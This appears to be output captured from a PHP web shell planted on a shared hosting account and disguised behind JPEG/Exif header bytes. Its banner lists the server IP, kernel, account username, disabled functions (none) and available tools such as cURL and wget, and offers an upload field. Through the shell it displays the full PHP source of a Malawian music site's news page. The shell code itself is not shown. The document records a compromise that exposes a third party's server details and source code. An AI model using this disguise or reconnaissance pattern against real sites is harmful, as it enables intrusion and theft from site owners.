����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 162.0.232.25 / Your IP : 18.118.33.239 Web Server : LiteSpeed System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : kwacuqig ( 988) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/kwacuqig/malawisounds.com/ |
Upload File : |
<?php include 'connect.php'; if (isset($_GET['pageno'])) { $pageno = $_GET['pageno']; } else { $pageno = 1; } $no_of_records_per_page = 10; $offset = ($pageno - 1) * $no_of_records_per_page; $total_pages_sql = "SELECT COUNT(*) FROM `news`"; $result = mysqli_query($conn, $total_pages_sql); $total_rows = mysqli_fetch_array($result)[0]; $total_pages = ceil($total_rows / $no_of_records_per_page); ?> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <link rel="icon" type="x-icon" href="Icons/malawisounds.ico"> <meta name="viewport" content="width=device-width,initial-scale=1.0"> <link rel="stylesheet" type="text/css" href="./css/animate.css"> <link rel="stylesheet" type="text/css" href="./css/load.css"> <link rel="stylesheet" type="text/css" href="./css/w3.css"> <link rel="stylesheet" type="text/css" href="impact/stylesheet.css" /> <link rel="stylesheet" type="text/css" href="bootstrap/css/bootstrap.min.css"> <script type="text/javascript" src="js/ajax.js"></script> <title>Malawisounds - News</title> </head> <body> <div class="margin"> <?php include './header.php'; ?> <!--Search bar--> <input type="text" id="search" placeholder=" SEARCH-MUSIC, ARTISTS" onkeyup="findmatch(this.value)" class="glyphicon glyphicon-search"> <!--search results goes here--> <div id="results" class="w3-container w3-light-grey"></div> <!-- End of nav Bar --> <?php /////////////////////////////////////////////////////////ARTISTS///////////////////////////////////////////// //query for selecting artists include 'connect.php'; $sql1 = "SELECT * FROM `biography` WHERE `trending`=1 ORDER BY `id` DESC"; if ($query_run = mysqli_query($conn, $sql1)) { echo "<div class=\"artist_table\">"; echo "<center class=\"w3-display-container\">"; echo "<table>"; echo "<tr>"; while ($row = mysqli_fetch_array($query_run)) { $path = $row['path']; $name = $row['artist_name']; $details = $row['artist_details']; $genre = $row['genre']; $city = $row['city']; $views = $row['views']; $id = $row['id']; ?> <td> <a href="artist=<?php echo str_replace(' ', '-', $name); ?>" target="_parent"> <img src="bio/<?php echo $path; ?>" alt="artist" /> </a> </td> <?php } echo "</tr>"; echo "</table>"; echo "</center>"; echo "</div>"; } else { die(mysqli_error($conn)); } ?> <div class="container-fluid"> <div class="row"> <?php /////////////////////////////////////////////////////////////NEWS///////////////////////////////////////////// $query = "SELECT * FROM `news` ORDER BY `nid` DESC LIMIT $offset, $no_of_records_per_page"; if ($news_query = mysqli_query($conn, $query)) { while ($row = mysqli_fetch_array($news_query)) { $id = $row['nid']; $title = $row['story_title']; $title_lower = mb_strtolower($row['story_title']); $details = $row['story_details']; $image = $row['image']; $writer = $row['writer']; $date = $row['date']; $views = $row['views']; ?> <div class="col-lg-4 col-sm-6 semi-width w3-hover-opacity wow fadeInUp" data-wow-delay="0.5s"> <a href="article=<?php echo $id; ?>"> <img src="news/<?php echo $image; ?>" alt="news"> <div class="news_title"><?php echo strtoupper($title); ?></div> </a> <div> <div class="writer"><span class="glyphicon glyphicon-edit"></span> <?php echo $writer; ?></div> <div class="date"><span class="glyphicon glyphicon-time"></span> <?php echo $date; ?></div> </div> <hr> </div> <?php } ?> <div class="clear"></div> <?php } else { die(mysqli_error($conn)); } ?> </div> </div> <!-- Pagination --> <div class="w3-center"> <div class="w3-bar"> <?php for ($x = 1; $x <= 1; $x++) { echo "<a href=\"?pageno=$x\" class=\"w3-button\">$x</a>"; } ?> <a href="<?php if ($pageno <= 1) { echo '#'; } else { echo "?pageno=" . ($pageno - 1); } ?>" class="w3-button">prev</a> <a href="<?php if ($pageno == $total_pages) { echo '#'; } else { echo "?pageno=" . ($pageno + 1); } ?>" class="w3-button">next</a> <?php echo "<a href=\"?pageno=$total_pages\" class=\"w3-button\">$total_pages</a>"; ?> </div> </div> <?php /////////////////////////////////////////////////////////////ADVERT///////////////////////////////////////////// //query for selecting adverts from db $sql3 = "SELECT aid,ads_name FROM `ads` ORDER BY `aid` DESC"; if ($query_run = mysqli_query($conn, $sql3)) { list($id, $imagepath) = mysqli_fetch_array($query_run); echo "<div style=\"overflow-x:auto;background-color:#b7b7b7;\" class=\"merchandise\">"; echo "<table>"; echo "<tr>"; ?> <td> <center><img src="ads/<?php echo $imagepath; ?>" alt="advert" /></center> </td> <?php echo "</tr>"; echo "</table>"; echo "</div>"; } else { die(mysqli_error($conn)); } ?> <!-- Footer --> <?php include './footer.php'; ?> </div> </body> </html> <script type="text/javascript" src="js/jquery.js"></script> <script type="text/javascript" src="js/nav.js"></script> <script src="./js/wow.js"></script> <script type="text/javascript"> function _(selector) { return document.querySelectorAll(selector); } _("ul li a")[4].style.backgroundColor = "#3f4243"; _("ul li a")[4].style.Color = "white"; //scripts for trimming news details x = document.querySelectorAll(".news_title"); for (i = 0; i < x.length; i++) { y = x[i].innerHTML; if (y.length <= 45) { z = x[i].innerHTML; } else { y = x[i].innerHTML.slice(0, 45); z = x[i].innerHTML = y + "..."; } } /* Animated Wow Js */ new WOW().init(); </script>